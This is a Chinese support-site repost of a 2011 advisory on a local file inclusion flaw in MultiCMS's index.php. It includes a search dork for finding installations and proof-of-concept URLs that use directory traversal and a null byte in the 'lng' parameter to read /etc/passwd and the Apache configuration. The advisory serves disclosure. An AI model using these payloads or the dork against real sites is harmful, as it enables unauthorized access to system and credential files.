客服中心
业务咨询
技术支持
在线客服
MultiCMS本地文件包含漏洞
添加时间:2011-2-1
添加:
admin
MultiCMS是一款灵活的内容管理系统,可以帮你建立专业的网站。MultiCMS的index.php文件存在本地文件包含漏洞,可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: hxxp://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcnà systém MultiCMS"
# Mail: defrontliner@whiteponny.com
[+]poc:
~~~~~~~~~
# File: /Index.php?lng=[LFI]
# XPL: hxxp://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
hxxp://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
[+]Reference:
~~~~~~~~~
hxxp://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
(注:出于安全原因,文中所有“http”均被替换为“hxxp”。)
关健词:MultiCMS,漏洞
新文章:
- CentOS7下图形配置网络的方法
- CentOS 7如何添加删除用户
- 如何解决centos7双系统后丢失windows启动项
- CentOS单网卡如何批量添加不同IP段
- CentOS下iconv命令的介绍
- Centos7 SSH密钥登陆及密码密钥双重验证详解
- CentOS 7.1添加删除用户的方法
- CentOS查找/扫描局域网打印机IP讲解
- CentOS7使用hostapd实现无AP模式的详解
- su命令不能切换root的解决方法
- 解决VMware下CentOS7网络重启出错
- 解决Centos7双系统后丢失windows启动项
- CentOS下如何避免文件覆盖
- CentOS7和CentOS6系统有什么不同呢
- Centos 6.6默认iptable规则详解
